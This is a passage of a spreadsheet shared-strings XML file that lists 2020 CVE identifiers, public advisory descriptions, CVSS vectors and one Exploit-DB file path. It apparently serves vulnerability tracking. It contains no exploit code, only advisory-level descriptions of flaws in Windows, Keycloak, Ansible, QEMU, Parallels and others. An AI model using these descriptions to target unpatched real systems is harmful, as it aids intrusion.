  </si>
  <si>
    <t>Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17138.</t>
  </si>
  <si>
    <t>CVE-2020-17095</t>
  </si>
  <si>
    <t>Hyper-V Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17096</t>
  </si>
  <si>
    <t>Windows NTFS Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17097</t>
  </si>
  <si>
    <t>Windows Digital Media Receiver Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17098</t>
  </si>
  <si>
    <t>Windows GDI+ Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17099</t>
  </si>
  <si>
    <t>Windows Lock Screen Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1710</t>
  </si>
  <si>
    <t>The issue appears to be that JBoss EAP 6.4.21 does not parse the field-name in accordance to RFC7230[1] as it returns a 200 instead of a 400.</t>
  </si>
  <si>
    <t>CVE-2020-17100</t>
  </si>
  <si>
    <t>Visual Studio Tampering Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17101</t>
  </si>
  <si>
    <t>HEIF Image Extensions Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17102</t>
  </si>
  <si>
    <t>WebP Image Extensions Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17103</t>
  </si>
  <si>
    <t>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17134, CVE-2020-17136.</t>
  </si>
  <si>
    <t>CVE-2020-17104</t>
  </si>
  <si>
    <t>Visual Studio Code JSHint Extension Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17105</t>
  </si>
  <si>
    <t>AV1 Video Extension Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17106</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17107, CVE-2020-17108, CVE-2020-17109, CVE-2020-17110.</t>
  </si>
  <si>
    <t>CVE-2020-17107</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17106, CVE-2020-17108, CVE-2020-17109, CVE-2020-17110.</t>
  </si>
  <si>
    <t>CVE-2020-17108</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17106, CVE-2020-17107, CVE-2020-17109, CVE-2020-17110.</t>
  </si>
  <si>
    <t>CVE-2020-17109</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17106, CVE-2020-17107, CVE-2020-17108, CVE-2020-17110.</t>
  </si>
  <si>
    <t>CVE-2020-1711</t>
  </si>
  <si>
    <t>An out-of-bounds heap buffer access flaw was found in the way the iSCSI Block driver in QEMU versions 2.12.0 before 4.2.1 handled a response coming from an iSCSI server while checking the status of a Logical Address Block (LBA) in an iscsi_co_block_status() routine. A remote user could use this flaw to crash the QEMU process, resulting in a denial of service or potential execution of arbitrary code with privileges of the QEMU process on the host.</t>
  </si>
  <si>
    <t>CVE-2020-17110</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17106, CVE-2020-17107, CVE-2020-17108, CVE-2020-17109.</t>
  </si>
  <si>
    <t>CVE-2020-17113</t>
  </si>
  <si>
    <t>Windows Camera Codec Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17115</t>
  </si>
  <si>
    <t>Microsoft SharePoint Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17117</t>
  </si>
  <si>
    <t>Microsoft Exchange Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17132, CVE-2020-17141, CVE-2020-17142, CVE-2020-17144.</t>
  </si>
  <si>
    <t>CVE-2020-17118</t>
  </si>
  <si>
    <t>Microsoft SharePoint Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17121.</t>
  </si>
  <si>
    <t>CVE-2020-17119</t>
  </si>
  <si>
    <t>Microsoft Outlook Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1712</t>
  </si>
  <si>
    <t>A heap use-after-free vulnerability was found in systemd before version v245-rc1, where asynchronous Polkit queries are performed while handling dbus messages. A local unprivileged attacker can abuse this flaw to crash systemd services or potentially execute code and elevate their privileges, by sending specially crafted dbus messages.</t>
  </si>
  <si>
    <t>CVE-2020-17120</t>
  </si>
  <si>
    <t>Microsoft SharePoint Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17121</t>
  </si>
  <si>
    <t>Microsoft SharePoint Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17118.</t>
  </si>
  <si>
    <t>CVE-2020-17122</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17123, CVE-2020-17125, CVE-2020-17127, CVE-2020-17128, CVE-2020-17129.</t>
  </si>
  <si>
    <t>CVE-2020-17123</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17122, CVE-2020-17125, CVE-2020-17127, CVE-2020-17128, CVE-2020-17129.</t>
  </si>
  <si>
    <t>CVE-2020-17124</t>
  </si>
  <si>
    <t>Microsoft PowerPoint Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17125</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17122, CVE-2020-17123, CVE-2020-17127, CVE-2020-17128, CVE-2020-17129.</t>
  </si>
  <si>
    <t>CVE-2020-17126</t>
  </si>
  <si>
    <t>Microsoft Excel Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17127</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17122, CVE-2020-17123, CVE-2020-17125, CVE-2020-17128, CVE-2020-17129.</t>
  </si>
  <si>
    <t>CVE-2020-17128</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17122, CVE-2020-17123, CVE-2020-17125, CVE-2020-17127, CVE-2020-17129.</t>
  </si>
  <si>
    <t>CVE-2020-17129</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17122, CVE-2020-17123, CVE-2020-17125, CVE-2020-17127, CVE-2020-17128.</t>
  </si>
  <si>
    <t>CVE-2020-17130</t>
  </si>
  <si>
    <t>CVE-2020-17131</t>
  </si>
  <si>
    <t>Chakra Scripting Engine Memory Corruption Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17132</t>
  </si>
  <si>
    <t>Microsoft Exchange Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17117, CVE-2020-17141, CVE-2020-17142, CVE-2020-17144.</t>
  </si>
  <si>
    <t>CVE-2020-17133</t>
  </si>
  <si>
    <t>Microsoft Dynamics Business Central/NAV Information Disclosure</t>
  </si>
  <si>
    <t>CVE-2020-17134</t>
  </si>
  <si>
    <t>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17136.</t>
  </si>
  <si>
    <t>CVE-2020-17135</t>
  </si>
  <si>
    <t>Azure DevOps Server Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17136</t>
  </si>
  <si>
    <t>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17134.</t>
  </si>
  <si>
    <t>CVE-2020-17137</t>
  </si>
  <si>
    <t>DirectX Graphics Kernel Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17138</t>
  </si>
  <si>
    <t>Windows Error Reporting Information Disclosure Vulnerability This CVE ID is unique from CVE-2020-17094.</t>
  </si>
  <si>
    <t>CVE-2020-17139</t>
  </si>
  <si>
    <t>Windows Overlay Filter Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1714</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak before version 11.0.0, where the code base contains usages of ObjectInputStream without type checks. This flaw allows an attacker to inject arbitrarily serialized Java Objects, which would then get deserialized in a privileged context and potentially lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-17140</t>
  </si>
  <si>
    <t>Windows SMB Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17141</t>
  </si>
  <si>
    <t>Microsoft Exchange Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17117, CVE-2020-17132, CVE-2020-17142, CVE-2020-17144.</t>
  </si>
  <si>
    <t>CVE-2020-17142</t>
  </si>
  <si>
    <t>Microsoft Exchange Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17117, CVE-2020-17132, CVE-2020-17141, CVE-2020-17144.</t>
  </si>
  <si>
    <t>CVE-2020-17143</t>
  </si>
  <si>
    <t>Microsoft Exchange Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17144</t>
  </si>
  <si>
    <t>Microsoft Exchange Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17117, CVE-2020-17132, CVE-2020-17141, CVE-2020-17142.</t>
  </si>
  <si>
    <t>CVE-2020-17145</t>
  </si>
  <si>
    <t>CVE-2020-17147</t>
  </si>
  <si>
    <t>Dynamics CRM Webclient Cross-site Scripting Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17148</t>
  </si>
  <si>
    <t>Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17150</t>
  </si>
  <si>
    <t>Visual Studio Code Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17152</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17158.</t>
  </si>
  <si>
    <t>CVE-2020-17153</t>
  </si>
  <si>
    <t>Microsoft Edge for Android Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17156</t>
  </si>
  <si>
    <t>Visual Studio Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-17158</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability This CVE ID is unique from CVE-2020-17152.</t>
  </si>
  <si>
    <t>CVE-2020-17159</t>
  </si>
  <si>
    <t>Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1716</t>
  </si>
  <si>
    <t>A flaw was found in the ceph-ansible playbook where it contained hardcoded passwords that were being used as default passwords while deploying Ceph services. Any authenticated attacker can abuse this flaw to brute-force Ceph deployments, and gain administrator access to Ceph clusters via the Ceph dashboard to initiate read, write, and delete Ceph clusters and also modify Ceph cluster configurations. Versions before ceph-ansible 6.0.0alpha1 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-17162</t>
  </si>
  <si>
    <t>Microsoft Windows Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2020-1717</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak 7.0.1. A logged in user can do an account email enumeration attack.</t>
  </si>
  <si>
    <t>CVE-2020-1718</t>
  </si>
  <si>
    <t>A flaw was found in the reset credential flow in all Keycloak versions before 8.0.0. This flaw allows an attacker to gain unauthorized access to the application.</t>
  </si>
  <si>
    <t>CVE-2020-1719</t>
  </si>
  <si>
    <t>A flaw was found in wildfly. The EJBContext principle is not popped back after invoking another EJB using a different Security Domain. The highest threat from this vulnerability is to data confidentiality and integrity. Versions before wildfly 20.0.0.Final are affected.</t>
  </si>
  <si>
    <t>270</t>
  </si>
  <si>
    <t>CVE-2020-1720</t>
  </si>
  <si>
    <t>A flaw was found in PostgreSQL's "ALTER ... DEPENDS ON EXTENSION", where sub-commands did not perform authorization checks. An authenticated attacker could use this flaw in certain configurations to perform drop objects such as function, triggers, et al., leading to database corruption. This issue affects PostgreSQL versions before 12.2, before 11.7, before 10.12 and before 9.6.17.</t>
  </si>
  <si>
    <t>CVE-2020-1721</t>
  </si>
  <si>
    <t>A flaw was found in the Key Recovery Authority (KRA) Agent Service in pki-core 10.10.5 where it did not properly sanitize the recovery ID during a key recovery request, enabling a reflected cross-site scripting (XSS) vulnerability. An attacker could trick an authenticated victim into executing specially crafted Javascript code.</t>
  </si>
  <si>
    <t>CVE-2020-1722</t>
  </si>
  <si>
    <t>A flaw was found in all ipa versions 4.x.x through 4.8.0. When sending a very long password (&gt;= 1,000,000 characters) to the server, the password hashing process could exhaust memory and CPU leading to a denial of service and the website becoming unresponsive. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-1723</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak Gatekeeper (Louketo). The logout endpoint can be abused to redirect logged-in users to arbitrary web pages. Affected versions of Keycloak Gatekeeper (Louketo): 6.0.1, 7.0.0</t>
  </si>
  <si>
    <t>CVE-2020-1724</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak in versions before 9.0.2. This flaw allows a malicious user that is currently logged in, to see the personal information of a previously logged out user in the account manager section.</t>
  </si>
  <si>
    <t>CVE-2020-1725</t>
  </si>
  <si>
    <t>A flaw was found in keycloak before version 13.0.0. In some scenarios a user still has access to a resource after changing the role mappings in Keycloak and after expiration of the previous access token.</t>
  </si>
  <si>
    <t>CVE-2020-1726</t>
  </si>
  <si>
    <t>A flaw was discovered in Podman where it incorrectly allows containers when created to overwrite existing files in volumes, even if they are mounted as read-only. When a user runs a malicious container or a container based on a malicious image with an attached volume that is used for the first time, it is possible to trigger the flaw and overwrite files in the volume.This issue was introduced in version 1.6.0.</t>
  </si>
  <si>
    <t>CVE-2020-1727</t>
  </si>
  <si>
    <t>A vulnerability was found in Keycloak before 9.0.2, where every Authorization URL that points to an IDP server lacks proper input validation as it allows a wide range of characters. This flaw allows a malicious to craft deep links that introduce further attack scenarios on affected clients.</t>
  </si>
  <si>
    <t>CVE-2020-1728</t>
  </si>
  <si>
    <t>A vulnerability was found in all versions of Keycloak where, the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors.</t>
  </si>
  <si>
    <t>CVE-2020-1729</t>
  </si>
  <si>
    <t>A flaw was found in SmallRye's API through version 1.6.1. The API can allow other code running within the application server to potentially obtain the ClassLoader, bypassing any permissions checks that should have been applied. The largest threat from this vulnerability is a threat to data confidentiality. This is fixed in SmallRye 1.6.2</t>
  </si>
  <si>
    <t>CVE-2020-1730</t>
  </si>
  <si>
    <t>A flaw was found in libssh versions before 0.8.9 and before 0.9.4 in the way it handled AES-CTR (or DES ciphers if enabled) ciphers. The server or client could crash when the connection hasn't been fully initialized and the system tries to cleanup the ciphers when closing the connection. The biggest threat from this vulnerability is system availability.</t>
  </si>
  <si>
    <t>CVE-2020-1731</t>
  </si>
  <si>
    <t>A flaw was found in all versions of the Keycloak operator, before version 8.0.2,(community only) where the operator generates a random admin password when installing Keycloak, however the password remains the same when deployed to the same OpenShift namespace.</t>
  </si>
  <si>
    <t>CVE-2020-1732</t>
  </si>
  <si>
    <t>A flaw was found in Soteria before 1.0.1, in a way that multiple requests occurring concurrently causing security identity corruption across concurrent threads when using EE Security with WildFly Elytron which can lead to the possibility of being handled using the identity from another request.</t>
  </si>
  <si>
    <t>CVE-2020-1733</t>
  </si>
  <si>
    <t>A race condition flaw was found in Ansible Engine 2.7.17 and prior, 2.8.9 and prior, 2.9.6 and prior when running a playbook with an unprivileged become user. When Ansible needs to run a module with become user, the temporary directory is created in /var/tmp. This directory is created with "umask 77 &amp;&amp; mkdir -p &lt;dir&gt;"; this operation does not fail if the directory already exists and is owned by another user. An attacker could take advantage to gain control of the become user as the target directory can be retrieved by iterating '/proc/&lt;pid&gt;/cmdline'.</t>
  </si>
  <si>
    <t>CVE-2020-1734</t>
  </si>
  <si>
    <t>A flaw was found in the pipe lookup plugin of ansible. Arbitrary commands can be run, when the pipe lookup plugin uses subprocess.Popen() with shell=True, by overwriting ansible facts and the variable is not escaped by quote plugin. An attacker could take advantage and run arbitrary commands by overwriting the ansible facts.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-1735</t>
  </si>
  <si>
    <t>A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, and then choose a new destination path on the controller node. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-17352</t>
  </si>
  <si>
    <t>Two OS command injection vulnerabilities in the User Portal of Sophos XG Firewall through 2020-08-05 potentially allow an authenticated attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-17353</t>
  </si>
  <si>
    <t>scm/define-stencil-commands.scm in LilyPond through 2.20.0, and 2.21.x through 2.21.4, when -dsafe is used, lacks restrictions on embedded-ps and embedded-svg, as demonstrated by including dangerous PostScript code.</t>
  </si>
  <si>
    <t>CVE-2020-17355</t>
  </si>
  <si>
    <t>Arista EOS before 4.21.12M, 4.22.x before 4.22.7M, 4.23.x before 4.23.5M, and 4.24.x before 4.24.2F allows remote attackers to cause a denial of service (restart of agents) by crafting a malformed DHCP packet which leads to an incorrect route being installed.</t>
  </si>
  <si>
    <t>CVE-2020-1736</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Engine when a file is moved using atomic_move primitive as the file mode cannot be specified. This sets the destination files world-readable if the destination file does not exist and if the file exists, the file could be changed to have less restrictive permissions before the move. This could lead to the disclosure of sensitive data. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-17360</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in ReadyTalk Avian 1.2.0. The vm::arrayCopy method defined in classpath-common.h contains multiple boundary checks that are performed to prevent out-of-bounds memory read/write. However, two of these boundary checks contain an integer overflow that leads to a bypass of these checks, and out-of-bounds read/write. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-17361</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in ReadyTalk Avian 1.2.0. The vm::arrayCopy method defined in classpath-common.h returns silently when a negative length is provided (instead of throwing an exception). This could result in data being lost during the copy, with varying consequences depending on the subsequent use of the destination buffer. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2020-17362</t>
  </si>
  <si>
    <t>search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2020-17363</t>
  </si>
  <si>
    <t>USVN (aka User-friendly SVN) before 1.0.9 allows remote code execution via shell metacharacters in the number_start or number_end parameter to LastHundredRequest (aka lasthundredrequestAction) in the Timeline module. NOTE: this may overlap CVE-2020-25069.</t>
  </si>
  <si>
    <t>CVE-2020-17364</t>
  </si>
  <si>
    <t>USVN (aka User-friendly SVN) before 1.0.9 allows XSS via SVN logs.</t>
  </si>
  <si>
    <t>CVE-2020-17365</t>
  </si>
  <si>
    <t>Improper directory permissions in the Hotspot Shield VPN client software for Windows 10.3.0 and earlier may allow an authorized user to potentially enable escalation of privilege via local access. The vulnerability allows a local user to corrupt system files: a local user can create a specially crafted symbolic link to a critical file on the system and overwrite it with privileges of the application.</t>
  </si>
  <si>
    <t>CVE-2020-17366</t>
  </si>
  <si>
    <t>An issue was discovered in NLnet Labs Routinator 0.1.0 through 0.7.1. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate Revocation List files from the RPKI relying party's view.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-17367</t>
  </si>
  <si>
    <t>Firejail through 0.9.62 does not honor the -- end-of-options indicator after the --output option, which may lead to command injection.</t>
  </si>
  <si>
    <t>CVE-2020-17368</t>
  </si>
  <si>
    <t>Firejail through 0.9.62 mishandles shell metacharacters during use of the --output or --output-stderr option, which may lead to command injection.</t>
  </si>
  <si>
    <t>CVE-2020-1737</t>
  </si>
  <si>
    <t>A flaw was found in Ansible 2.7.17 and prior, 2.8.9 and prior, and 2.9.6 and prior when using the Extract-Zip function from the win_unzip module as the extracted file(s) are not checked if they belong to the destination folder. An attacker could take advantage of this flaw by crafting an archive anywhere in the file system, using a path traversal. This issue is fixed in 2.10.</t>
  </si>
  <si>
    <t>CVE-2020-17372</t>
  </si>
  <si>
    <t>SugarCRM before 10.1.0 (Q3 2020) allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-17373</t>
  </si>
  <si>
    <t>SugarCRM before 10.1.0 (Q3 2020) allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-17376</t>
  </si>
  <si>
    <t>An issue was discovered in Guest.migrate in virt/libvirt/guest.py in OpenStack Nova before 19.3.1, 20.x before 20.3.1, and 21.0.0. By performing a soft reboot of an instance that has previously undergone live migration, a user may gain access to destination host devices that share the same paths as host devices previously referenced by the virtual machine on the source host. This can include block devices that map to different Cinder volumes at the destination than at the source. Only deployments allowing host-based connections (for instance, root and ephemeral devices) are affected.</t>
  </si>
  <si>
    <t>CVE-2020-1738</t>
  </si>
  <si>
    <t>A flaw was found in Ansible Engine when the module package or service is used and the parameter 'use' is not specified. If a previous task is executed with a malicious user, the module sent can be selected by the attacker using the ansible facts file. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L</t>
  </si>
  <si>
    <t>exploits/windows/local/48836.c</t>
  </si>
  <si>
    <t>MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation</t>
  </si>
  <si>
    <t>CVE-2020-17380</t>
  </si>
  <si>
    <t>A heap-based buffer overflow was found in QEMU through 5.0.0 in the SDHCI device emulation support. It could occur while doing a multi block SDMA transfer via the sdhci_sdma_transfer_multi_blocks() routine in hw/sd/sdhci.c. A guest user or process could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition, or potentially execute arbitrary code with privileges of the QEMU process on the host.</t>
  </si>
  <si>
    <t>CVE-2020-17381</t>
  </si>
  <si>
    <t>An issue was discovered in Ghisler Total Commander 9.51. Due to insufficient access restrictions in the default installation directory, an attacker can elevate privileges by replacing the %SYSTEMDRIVE%\totalcmd\TOTALCMD64.EXE binary.</t>
  </si>
  <si>
    <t>CVE-2020-17382</t>
  </si>
  <si>
    <t>The MSI AmbientLink MsIo64 driver 1.0.0.8 has a Buffer Overflow (0x80102040, 0x80102044, 0x80102050,and 0x80102054).</t>
  </si>
  <si>
    <t>CVE-2020-17383</t>
  </si>
  <si>
    <t>A directory traversal vulnerability on Telos Z/IP One devices through 4.0.0r grants an unauthenticated individual root level access to the device's file system. This can be used to identify configuration settings, password hashes for built-in accounts, and the cleartext password for remote configuration of the device through the WebUI.</t>
  </si>
  <si>
    <t>CVE-2020-17384</t>
  </si>
  <si>
    <t>Cellopoint Cellos v4.1.10 Build 20190922 does not validate URL inputted properly. With the cookie of the system administrator, attackers can inject and remotely execute arbitrary command to manipulate the system.</t>
  </si>
  <si>
    <t>CVE-2020-17385</t>
  </si>
  <si>
    <t>Cellopoint Cellos v4.1.10 Build 20190922 does not validate URL inputted properly, which allows unauthorized user to launch Path Traversal attack and access arbitrate file on the system.</t>
  </si>
  <si>
    <t>CVE-2020-17386</t>
  </si>
  <si>
    <t>Cellopoint Cellos v4.1.10 Build 20190922 does not validate URL inputted properly. With cookie of an authenticated user, attackers can temper with the URL parameter and access arbitrary file on system.</t>
  </si>
  <si>
    <t>CVE-2020-17387</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the writeObjectToConfigFile method of the GWTTestServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10565.</t>
  </si>
  <si>
    <t>CVE-2020-17388</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the Tomcat configuration file. The issue results from the lack of proper restriction to the Tomcat admin console. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10799.</t>
  </si>
  <si>
    <t>CVE-2020-17389</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the decryptFile method of the GWTTestServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10502.</t>
  </si>
  <si>
    <t>CVE-2020-1739</t>
  </si>
  <si>
    <t>A flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument "password" of svn module, it is used on svn command line, disclosing to other users within the same node. An attacker could take advantage by reading the cmdline file from that particular PID on the procfs.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-17390</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.2-47123. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the hypervisor kernel extension. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the hypervisor. Was ZDI-CAN-10030.</t>
  </si>
  <si>
    <t>CVE-2020-17391</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose information on affected installations of Parallels Desktop 15.1.3-47255. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handler for HOST_IOCTL_INIT_HYPERVISOR in the prl_hypervisor kext. The issue results from the exposure of dangerous method or function to the unprivileged user. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel. Was ZDI-CAN-10518.</t>
  </si>
  <si>
    <t>CVE-2020-17392</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.3-47255. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handler for HOST_IOCTL_SET_KERNEL_SYMBOLS in the prl_hypervisor kext. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the kernel. Was ZDI-CAN-10519.</t>
  </si>
  <si>
    <t>CVE-2020-17393</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose information on affected installations of Parallels Desktop 15.1.3-47255. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the prl_hypervisor kext. The issue results from the lack of proper validation of user-supplied data, which can result a pointer to be leaked after the handler is done. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel. Was ZDI-CAN-10520.</t>
  </si>
  <si>
    <t>CVE-2020-17394</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to disclose sensitive information on affected installations of Parallels Desktop 15.1.4. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the OEMNet component. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute code in the context of the hypervisor. Was ZDI-CAN-11132.</t>
  </si>
  <si>
    <t>CVE-2020-17395</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.4. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability. The specific flaw exists within the prl_naptd process. The issue results from the lack of proper validation of user-supplied data, which can result in an integer underflow before writing to memory. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the hypervisor. Was ZDI-CAN-11134.</t>
  </si>
  <si>
    <t>CVE-2020-17396</t>
  </si>
  <si>
    <t>This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop 15.1.4. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the prl_hypervisor module. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of the kernel. Was ZDI-CAN-11217.</t>
  </si>
  <si>
    <t>CVE-2020-17397</t>
  </si>
  <si>
